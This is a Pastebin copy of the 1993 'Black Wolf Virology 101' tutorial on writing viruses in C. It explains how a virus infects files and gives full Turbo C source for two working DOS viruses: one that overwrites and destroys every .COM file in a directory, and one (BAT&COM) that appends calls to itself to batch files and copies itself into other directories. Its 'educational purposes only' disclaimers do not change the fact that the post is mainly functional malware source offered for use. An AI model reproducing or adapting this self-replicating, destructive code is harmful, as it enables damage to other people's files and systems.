FlyFar

Tutorials - Black Wolf Virology 101 - Virus in C

Jul 9th, 2023
116
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 10.61 KB | Cybersecurity | 0 0
  1.     Upper-level languages, such as Basic, C, and a multitude of
  2.     others, are where most programmers these days feel at home.  They
  3.     provide users with an amazing amount of built-in functionality
  4.     and allow the programmer to escape from having to deal with the
  5.     machine that is being programmed on, and instead focus on the
  6.     details of the program design.  For viruses, this makes them easy
  7.     languages to start in, but there are several obstacles.  The first
  8.     is that most upper-level languages simply were not made to program
  9.     at a base systems level, even in C this is not easy.  As a result,
  10.     most viruses that are in this genre are primitive [usually
  11.     overwriting] in their reproduction mechanism, although their
  12.     activation routines can be impressive.  Another really important
  13.     disadvantage is that high-level languages often create files that
  14.     are at the very LEAST 10k and often much higher - not very
  15.     efficient for a virus.  With this overhead, a memory-resident
  16.     virus is impractical as it would usually be noticed by the user
  17.     when a rather large chunk of memory disappears for no apparent
  18.     reason.
  19.  
  20.          Another possibility with high-level languages, however, is a
  21.     source-code virus.  This kind of virus is quite rare (to the best
  22.     of my knowledge) but could be very effective.  What a source-code
  23.     virus does, in short, search for another source file in the
  24.     same language - for example, it might search for all files with a
  25.     ".C" extension for C.  It would then add its own source code to
  26.     the file (often by way of "including" a header with the routines
  27.     and placing a call to it in main()) which would execute once the
  28.     program was compiled.  After compilation, the virus would be more
  29.     or less hidden inside the application and would be dormant until
  30.     it found another ".C" file.  The only documented case of this that
  31.     I know of Mark Ludwig's virus presented in Computer Virus
  32.    Developments Quarterly, Volume 1, Number 2.
  33.  
  34.         At any rate, all of these viruses have some basic steps in
  35.    common. They are:
  36.  
  37.            1) Find a file to infect, be it an executable, source,
  38.               or whatever (If none is found, go to step 3)
  39.            2) Place virus in the file.
  40.            3) Decide if any activation routines are met and, if so,
  41.               activate.
  42.            4) Return to host or terminate and return to DOS.
  43.  
  44.         For overwriting viruses, the implementation of these is quite
  45.    simple. The only problem with these viruses is that they totally
  46.    destroy any program that they infect, making them quite obvious.
  47.    The only way to cure these is to find all of the infected files
  48.    and delete them, restoring them from backups.  The following virus
  49.    is an extremely simple overwriting virus written in C.  It will
  50.    infect all.COM files within the current directory, destroying
  51.    them completely.  As it infects each file, it will print
  52.    "Infecting [FILENAME]" on the screen as a warning.  If you compile
  53.    it to test it, compile it once, then EXE2BIN it and check the
  54.    resultant size.  If it does not equal 9504 bytes, change the line
  55.    "x=9054;" to the appropriate size value.  Do be careful with this
  56.    virus, because while it is a primitive one, it will destroy any
  57.    .COM files that it hits.
  58.  
  59.    - - ------------------ Cut Here -------------------------- - -
  60.    /* This is a simple overwriting virus programmed in Turbo C */
  61.    /*  It will infect all .COM files in the current directory  */
  62.    /*    Infections destroy the programs and cannot be cured   */
  63.    /*   It was presented in Virology 101 (c) 1993 Black Wolf   */
  64.    /*     FOR EDUCATIONAL PURPOSES ONLY, DO NOT RELEASE!       */
  65.  
  66.    #include <stdio.h>
  67.    #include <dos.h>
  68.    #include <dir.h>
  69.  
  70.    FILE *Virus,*Host;
  71.    int x,y,done;
  72.    char buff[256];
  73.    struct ffblk ffblk;
  74.  
  75.    main()
  76.    {
  77.     done = findfirst("*.COM",&ffblk,0);   /* Find a .COM file */
  78.       while (!done)               /* Loop for all COM's in DIR*/
  79.         {
  80.         printf("Infecting  %s\n", ffblk.ff_name);    /* Inform user */
  81.         Virus=fopen(_argv[0],"rb");          /* Open infected file  */
  82.         Host=fopen(ffblk.ff_name,"rb+");     /* Open new host file  */
  83.  
  84.         x=9504;                               /* Virus size - must   */
  85.                                               /* be correct for the  */
  86.                                               /* compiler it is made */
  87.                                               /* on, otherwise the   */
  88.                                               /* entire virus may not*/
  89.                                               /* be copied!!         */
  90.         while (x>256)                         /* OVERWRITE new Host  */
  91.             {                                 /* Read/Write 256 byte */
  92.             fread(buff,256,1,Virus);          /* chunks until bytes  */
  93.             fwrite(buff,256,1,Host);          /* left < 256          */
  94.             x-=256;
  95.             }
  96.         fread(buff,x,1,Virus);                /* Finish off copy     */
  97.         fwrite(buff,x,1,Host);
  98.         fcloseall();                          /* Close both files and*/
  99.         done = findnext(&ffblk);              /* go for another one. */
  100.         }
  101.                                               /* Activation would go */
  102.                                               /* here                */
  103.       return (0);                             /* Terminate           */
  104.     }
  105.     - - ------------------ Cut Here --------------------------- - -
  106.  
  107.          The next virus to be presented is also in C, but is quite a
  108.     bit different in functioning than the last.  Instead of infecting
  109.     executable files by overwriting them, it infects .BAT files by
  110.     the directory.  When executed, BAT&COM will first search one
  111.     directory below the current for batch files.  If none are found,
  112.     it will try the root directory, then finally the DOS directory.
  113.     If it finds any batch files, it will infect all of the batches
  114.     in the directory, then check to see if its file has already
  115.     been put there.  If not, then it will create a file called
  116.     BAT&COM containing the virus.  On my setup, after EXE2BIN-ing
  117.     the file, it came out around 10k. The virus code is as follows:
  118.  
  119.                         The BAT&COM Virus in C
  120.  
  121.     - - - -----------------Start Code------------------------- - - -
  122.     /*  This file is a high-level language virus of a different sort.
  123.         It will search out batch files and, when found, place a copy
  124.         of itself in the directory with the batch file while adding
  125.         instructions in the BAT to execute this new file.  In this way,
  126.         it will spread each time an "infected" batch is run.
  127.         Disinfection is done simply by deleting all of the BAT&COM.COM
  128.         files and removing the commands from batch files that ruin
  129.         them.  This one is NOT confined to the current directory,
  130.         so make sure it is on an isolated machine and be sure to
  131.         clean up any infections. PLEASE DO NOT RELEASE!
  132.  
  133.         BAT&COM virus is (C) 1993 Black Wolf Enterprises.
  134.     */
  135.  
  136.  
  137.     #include <stdio.h>
  138.     #include <dos.h>
  139.     #include <dir.h>
  140.     #include <string.h>
  141.  
  142.             struct ffblk ffblk;
  143.     main()
  144.     {
  145.          char old_dir[MAXPATH];
  146.          Get_Path(old_dir);            /* Save the old directory  */
  147.          Pick_A_Dir();                 /* Find a new directory to */
  148.          Infect_Directory();           /* infect and infect it.   */
  149.          chdir(old_dir);               /* Return to old directory */
  150.          return 0;
  151.     }
  152.  
  153.  
  154.  
  155.     Pick_A_Dir()
  156.     {
  157.          int done;
  158.          chdir("..");                      /* First, Go out a DIR. */
  159.          done=findfirst("*.BAT",&ffblk,0); /* If no BAT files, try */
  160.                                            /* root and DOS         */
  161.          if (done)
  162.                 {
  163.                 chdir("\\");
  164.                 done=findfirst("*.BAT",&ffblk,0);
  165.                 if (done) chdir("\\DOS\\");
  166.                 }
  167.     return 0;
  168.     }
  169.  
  170.  
  171.     Infect_Directory()
  172.     {
  173.          int done;
  174.  
  175.          done = findfirst("*.BAT",&ffblk,0);
  176.          while (!done)                       /* Find all .BAT files */
  177.             {                                /* and add code to run */
  178.              Do_Batch();                     /* BAT&COM if not      */
  179.              done = findnext(&ffblk);        /* already there       */
  180.             }
  181.  
  182.          if (findfirst("BAT&COM.COM",&ffblk,0)) /* If BAT&COM does  */
  183.             {Copy_Virus();}                     /* not exist, then  */
  184.          return 0;                              /* copy it into dir.*/
  185.     }
  186.  
  187.  
  188.  
  189.     Do_Batch()
  190.     {
  191.             FILE *batch;
  192.             char Infection_Buffer[12];
  193.             char vpath[MAXPATH];
  194.  
  195.             Get_Path(vpath);            /* Get path for adding path */
  196.                                         /* specifier in commands    */
  197.  
  198.  
  199.             if (vpath[3]==0) vpath[2]=0; /* Keep path good in root  */
  200.  
  201.             batch=fopen(ffblk.ff_name, "rt+");
  202.             fseek(batch, -11, SEEK_END);
  203.             fread(Infection_Buffer,11,1,batch);
  204.             Infection_Buffer[11]=0;             /* Terminate String */
  205.  
  206.             if (strcmp(Infection_Buffer,"BAT&COM.COM")) /* Check if */
  207.                     {                                   /* Batch is */
  208.                     fseek(batch, 0, SEEK_END);          /* infected.*/
  209.                     fprintf(batch,"\n%s\\BAT&COM.COM",vpath);
  210.                     }                              /*^- Add command */
  211.                                                    /*   to batch    */
  212.  
  213.             fclose(batch);
  214.             return 0;
  215.     }
  216.  
  217.  
  218.     Copy_Virus()
  219.     {
  220.          FILE *old_virus, *new_virus;
  221.          int write_length;
  222.          char copy_buffer[1024];              /* Copy the virus to */
  223.                                               /* new directory     */
  224.          old_virus=fopen(_argv[0],"rb");
  225.          new_virus=fopen("BAT&COM.COM","wb");
  226.  
  227.          write_length=1024;
  228.  
  229.          while (write_length==1024)
  230.             {
  231.             write_length=fread(copy_buffer,1,1024,old_virus);
  232.             fwrite(copy_buffer,write_length,1,new_virus);
  233.             }
  234.          fclose(old_virus);
  235.          fclose(new_virus);
  236.          return 0;
  237.     }
  238.  
  239.  
  240.     Get_Path(char *path)
  241.     {
  242.             strcpy(path, "A:\\");
  243.             path[0] ='A' + getdisk();    /* Returns current path */
  244.             getcurdir(0, path+3);
  245.             return 0;
  246.     }
  247.     - - - -----------------End of Code------------------------ - - -
  248.  
Tags: tutorial virus
Add Comment
Please, Sign In to add comment